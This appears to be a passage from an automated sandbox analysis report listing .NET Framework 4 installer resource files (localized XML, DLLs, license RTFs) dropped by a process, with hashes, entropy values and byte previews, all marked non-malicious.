                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.s.j.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k.j...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.m.o.d.u.s... .H.v.i.s. .d.u. .v.i.l. .h.a. .m.e.r. .i.n.f.o.r.m.a.s.j.o.n.,. .s.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.k.t.i.g.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.

                                                            C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.209166644217636
                                                            Encrypted:false
                                                            SSDEEP:384:cNeu+Oeu+Oeu+rW56qxYBlgFAcUm/rW9eWoLXci2jpv72:TIxYBegm/WgMi2jpv72
                                                            MD5:BACEA57A781C43738A3B065103479BB5
                                                            SHA1:45E277CC370150293252535D5371B2C0F79B4874
                                                            SHA-256:8B372354A54643F1159FAB562D0F2DFE21F08A3D67DBB7337242846316D3BEC4
                                                            SHA-512:CD0BB774D1373A7B735AE9A867387527DAB28D7635B5DE881F92B66ECD87DA4E8F4605F3DF093294CA3060F993220472D3C926780BEB57BF3E90ECC081F0F1E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P.......H....@.......................................... ..t'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1044\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1044
                                                            Category:dropped
                                                            Size (bytes):3046
                                                            Entropy (8bit):5.1859499604057495
                                                            Encrypted:false
                                                            SSDEEP:48:rPN3nffnyzInT7BjTgLDRn0l392N4S2ZOMb5XgNRc9q5QB34pg5lqM9TX/ufMpDn:rPBffyUnT7BjTADRn0lN2N4S2wG5wNRq
                                                            MD5:830EBCED0F03F267EEE7A5167C4E91A4
                                                            SHA1:740075166941E5623ECB488B0390F25A84FEEC77
                                                            SHA-256:2D0B46674BB383A56E6061D25F0D446C8B50C83C92269A3FCCB657429E9EF4BE
                                                            SHA-512:CD146C8F35C1095E142EEDF2B486A22593A417138CAE35FBA00DEFB5395D6DAA34C84B6A345AE88A5B365D4E17190FD3C7F3AA384D2D4472E0413F432280F53E
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1044\deflangfe1044{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 TILLEGGSLISENSVILK\'c5R FOR MICROSOFT-PROGRAMVARE\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0\fs22 MICROSOFT .NET FRAMEWORK 4 FOR MICROSOFT WINDOWS-OPERATIVSYSTEM\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4-KLIENTPROFIL FOR MICROSOFT WINDOWS-OPERATIVSYSTEM\par..OG TILKNYTTEDE SPR\'c5KPAKKER\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0\fs20 Microsoft Corporation (eller, avhengig av hvor du bor, et av dets tilknyttede selskaper) lisensierer dette tillegget til deg.\b \b0 Hvis du er lisensiert til \'e5 bruke Microsoft Windows-operativsystemprogramvare (som dette tillegget gjelder for) (\ldblquote programvaren\rdblquote ), har du r

                                                            C:\6c8944922f7b98d0b6cd82b768\1045\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (691), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82374
                                                            Entropy (8bit):3.6806551409534465
                                                            Encrypted:false
                                                            SSDEEP:768:lz2ue+xTxXUpUqTvvUOfUs6LArUpFymrqQtr8BAyfO4RkSzXunasvJH2TF0wpYl7:lz2ue+xTxXUpUOvvUOfUs6LqTavdJkUr
                                                            MD5:BDB583C7A48F811BE3B0F01FCEA40470
                                                            SHA1:E8453946A6B926E4F4AE5B02BA1D648DAF23E133
                                                            SHA-256:611B7B7352188ADFFD6380B9C8A85B8FF97C09A1C293BB7AC0EF5478A0E18AC8
                                                            SHA-512:27B02226F8F86CA4D00789317C79E8CA0089F5B910BED14AA664EEAB6BE66E98DE3BAFD7670C895D70AB9C34ECE5F05199F3556FDDC1B165904E3432A51C008D
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.a.t.o.r. .n.i.e. .m.o.|.e. .d.z.i.a.B.a... .w. .t.r.y.b.i.e. .z.g.o.d.n.o.[.c.i... .A.b.y. .u.z.y.s.k.a... .w.i...c.e.j. .i.n.f.o.r.m.a.c.j.i.,. .z.o.b.a.c.z. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.P.l.i.k. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.

                                                            C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.2854545598714635
                                                            Encrypted:false
                                                            SSDEEP:192:fa1YUfwxWVxSIn+hnISv7N/blaRr26WneWAQKPnEtObMacxc8hjeyveCXW:iN2Gan9xblaRr26WneWALXci2jpvQ
                                                            MD5:550C79640EEE713C73EB67B0736A92E6
                                                            SHA1:51656BB182048F0ABFC57DC2DF9703D59E264442
                                                            SHA-256:F90002DA2068F868D5A710444EA30F91AE2229DBEB660166C1E28935E4AB6078
                                                            SHA-512:F90A9A5C399DEC2649E8EC088139E5FE4DD0419BDF7B5988BE8F437A35040A1E0D2F03D326B8C38B2F4F1CFDBE0269445120D95061BD691296E7C9B20C5EAC31
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P............@.......................................... ...(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1045\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):4040
                                                            Entropy (8bit):5.362038982382671
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfQaJRTIRTjzH+oDgQUoIs89FcG5ywI5Et/+TMm9MpDcA/+MvsNcUOsG9jeLdp:Zfo+Bs18ncG5Y5Et/+Z9OwAjs7OtRwdp
                                                            MD5:BB93B108D4BE954133380F7709E7BA1E
                                                            SHA1:34376037B3C5879142796A2F524E5B3EA6097ED1
                                                            SHA-256:4F2D6A8979C89592877555FE8F576D5F631132452AFE86114D35E9531A1CA948
                                                            SHA-512:69C60EF8C0E6A8F7A92EC9A9C94C99F6DDE39477D8DEE041ABF7A164025D7EBFC9F0C7399AD8C9ED150861B00FC47F1F1CB40BB245AA87ED7904B1BAE6A4271B
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1045\b\f0\fs20 UZUPE\'a3NIAJ\'a5CE POSTANOWIENIA LICENCYJNE DOTYCZ\'a5CE OPROGRAMOWANIA MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 DLA SYSTEMU OPERACYJNEGO MICROSOFT WINDOWS\f1\par..\f0 PROFIL KLIENTA PROGRAMU MICROSOFT .NET FRAMEWORK 4 DLA SYSTEMU OPERACYJNEGO MICROSOFT WINDOWS\par..I POWI\'a5ZANYCH PAKIET\'d3W J\'caZYKOWYCH\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Microsoft \lang1045 Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jeden z\~podmiot\'f3w stowarzyszonych Microsoft Corporation) udziela Licencjobiorcy

                                                            C:\6c8944922f7b98d0b6cd82b768\1046\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (669), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80738
                                                            Entropy (8bit):3.581949939963976
                                                            Encrypted:false
                                                            SSDEEP:384:4wl7DAQput9emRem6cvMOem6QemIAY/YEQTeQoqk7EHd9nKxXq5fKsLaG5m73Rdv:geOeqeCe1CkyJtG07g
                                                            MD5:A03D2063D388FC7A1B4C36D85EFA5A1A
                                                            SHA1:88BD5E2FF285EE421CCC523F7582E05A8C3323F8
                                                            SHA-256:61D8339E89A9E48F8AE2D929900582BB8373F08D553EC72D5E38A0840B47C8A3
                                                            SHA-512:3A219F36E57D90CA92E9FAEC4DFD34841C2C9244DA4FE7E1D70608DDE7857AA36325BDB46652A42922919F782BB7C97F567E69A9FC51942722B8FD66CD4ECAF0
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".N...o. ... .p.o.s.s...v.e.l. .e.x.e.c.u.t.a.r. .a. .i.n.s.t.a.l.a.....o. .e.m. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d.e... .P.a.r.a. .o.b.t.e.r. .m.a.i.s. .i.n.f.o.r.m.a.....e.s.,. .c.o.n.s.u.l.t.e. .o. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.q.u.i.v.o. .L.e.i.a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.

                                                            C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.203641313145023
                                                            Encrypted:false
                                                            SSDEEP:192:zjkTnUfwVWwwZFf7TOS7LDoKGslNDGf8BjWNeWSQKPnEtObMacxc8hjeyveCXKuj:zom6QT7FprmmWNeWSLXci2jpv3j
                                                            MD5:86CB58F2B6BC1174D200D0ABE5497233
                                                            SHA1:F1174409A44D922C23F376C6BC7609BBDAD5016C
                                                            SHA-256:DD7FB50E88355F46D619D89E47D3057ACC1C069178BA81839970BB13479FCF4C
                                                            SHA-512:AD4C9124F2459FB83C977B235B7ACDDA86AFAEBE9FEBD8BE084AA50E87AB091331A8724EC517D5096487970A3992C7E3D255CDA31DC494544CABA5DEF9C93DD1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......E.....@.......................................... ...(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1046\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3683
                                                            Entropy (8bit):5.188584376027454
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfAlMu9fTp/9fTdIDsGJ1KlhREerHr7uStmESWp55ztFuMpDl/BRwZ+qf+J4Ed:ZfeuqhGeHVIErn1zuO9BC8q2WEHt+B2
                                                            MD5:E43708161843A33D34D6FDF966D36397
                                                            SHA1:2E5C0450CEBD9A737A90908EEDDAAE2D0B3E2940
                                                            SHA-256:0AF1F04F416712387BF87C93FA846B4E8EB0AC25E284A2A3578C58E2724E2778
                                                            SHA-512:FB334D29BBBC2D19D20C5260C55BF83D9D6D242C6A8F04AC88F8280A63E6AF32FB5D96703E43D39F6863D17B27D9E0E36CBAB1099127E5FA281255A19AE39E0D
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1046\b\f0\fs20 TERMOS DE LICEN\'c7A COMPLEMENTARES PARA SOFTWARE DA MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1046\f0 MICROSOFT .NET FRAMEWORK 4 PARA SISTEMA OPERACIONAL MICROSOFT WINDOWS\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\lang1046\f0 PERFIL DO CLIENTE DO MICROSOFT .NET FRAMEWORK 4 PARA SISTEMA OPERACIONAL MICROSOFT WINDOWS\line\par..E PACOTES DE IDIOMAS ASSOCIADOS\lang1033\b0\f1\fs22\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1046\f0\fs20 A Microsoft Corporation (ou, dependendo do local em que voc\'ea esteja domiciliado, uma de suas afiliadas) fornece a voc\'ea a licen\'e7a deste supleme

                                                            C:\6c8944922f7b98d0b6cd82b768\1049\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (712), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):81482
                                                            Entropy (8bit):4.270033694989682
                                                            Encrypted:false
                                                            SSDEEP:384:4w7iPuXsPXBUhOLGvVVA5/Fpn9zJop9TE+zkX6JS/5cGhj/6v:MP5XyZVrJF
                                                            MD5:349B52A81342A7AFB8842459E537ECC6
                                                            SHA1:6268343E82FBBABE7618BD873335A8F9F84ED64D
                                                            SHA-256:992BF5AEB06AA3701D50C23FA475B4B86D8997383C9F0E3425663CFBD6B8A2A5
                                                            SHA-512:EF4CBD3F7F572A9F146A524CFBC2EFBD084E6C70A65B96A42339ADC088E3F0524BC202548340969481E7F3DF3AC517AC34B200B56A3B9957802ABD0EFA951C49
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...5. .C.4.0.5.B.A.O. .2.K.?.>.;.=.8.B.L. .C.A.B.0.=.>.2.:.C. .2. .@.5.6.8.<.5. .A.>.2.<.5.A.B.8.<.>.A.B.8... ...>.?.>.;.=.8.B.5.;.L.=.K.5. .A.2.5.4.5.=.8.O. .A.<... .2. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.D.0.9.;.5. .A.2.5.4.5.=.8.9. .>. .?.@.>.4.C.:.B.5.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.

                                                            C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.548909804205606
                                                            Encrypted:false
                                                            SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
                                                            MD5:7EF74AF6AB5760950A1D233C582099F1
                                                            SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
                                                            SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
                                                            SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......O.....@.......................................... ...*...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1049\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                            Category:dropped
                                                            Size (bytes):54456
                                                            Entropy (8bit):4.950349023670169
                                                            Encrypted:false
                                                            SSDEEP:768:3CR6rdlWFJv3zGz9tWQ2ni8UNo/8PZrS14Z:3CcrMeDZ
                                                            MD5:2277852A45DA18B12BEEC5FB6F08CDC9
                                                            SHA1:E564862D098BD111430C4208EAA1ADD5CD52A601
                                                            SHA-256:59AD806664E3CE4A024452985C4602D5610126A16FC36ADE018A9756ACCC92CC
                                                            SHA-512:ED9726D207479E4DF494C6AF17E64909EA6649DDD8BDC3E37229A73270B4A159B2B11C1ADD462871DD40A23033E6B3F8A26E3EA1FA6E3B7316153AF13B316CD2
                                                            Malicious:false
                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f44\fbidi \froman\fcharset0\fprq2 Times New Roman CYR;}{\f45\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\pa

                                                            C:\6c8944922f7b98d0b6cd82b768\1053\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (622), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77680
                                                            Entropy (8bit):3.602060477304833
                                                            Encrypted:false
                                                            SSDEEP:384:4w+optBSCVb5v6iMSsCtD7jjktDhHfLSGM3zD0q0Xt//Vvcinnl/06N9mGktJsIO:QqtBSCVb5v69SsuD7jwDkqmGeJsoON
                                                            MD5:B3B1A89458BEC6AF82C5386D26639B59
                                                            SHA1:D9320B8CC862F40C65668A40670081079B63CEA1
                                                            SHA-256:1EF312E8BE9207466FBFDECEE92BFC6C6B7E2DA61979B0908EAF575464E7B7A0
                                                            SHA-512:478CE08619490ED1ECDD8751B5F60DA1EE4AC0D08D9A97468C3F595AC4376FECA59E9C72DD9C83B00C8D78B298BE757C6F24A422B7BE8C041F780524844998BF
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.t.i.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.n.t.e. .k...r.a.s. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.l...g.e... .M.e.r. .i.n.f.o.r.m.a.t.i.o.n. .f.i.n.n.s. .i. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.k.t.i.g.t.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.

                                                            C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.196946497211754
                                                            Encrypted:false
                                                            SSDEEP:384:W9U6qxM8IJu5M/oZVQVWpyeWRLXci2jpvE:WIxMwLVWVMi2jpvE
                                                            MD5:28813510B82F45868B5BDC67FFF9C9FA
                                                            SHA1:696A06D1F7B13C20599C53E74969BDC99AB5D30A
                                                            SHA-256:EB0A73F6BFAF65FAA58440D57145709894E9A5354E840805EC02DCE153332249
                                                            SHA-512:A01A7C8147138125BBFF7D135FACF255A0284AFABD2BB28D5CB6E54C86A8F1A685855B5561584574A057D4FCFDEF630A10AD262495C58EA5DF974A3249787D9B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P......8p....@.......................................... ...'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1053\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1053
                                                            Category:dropped
                                                            Size (bytes):3865
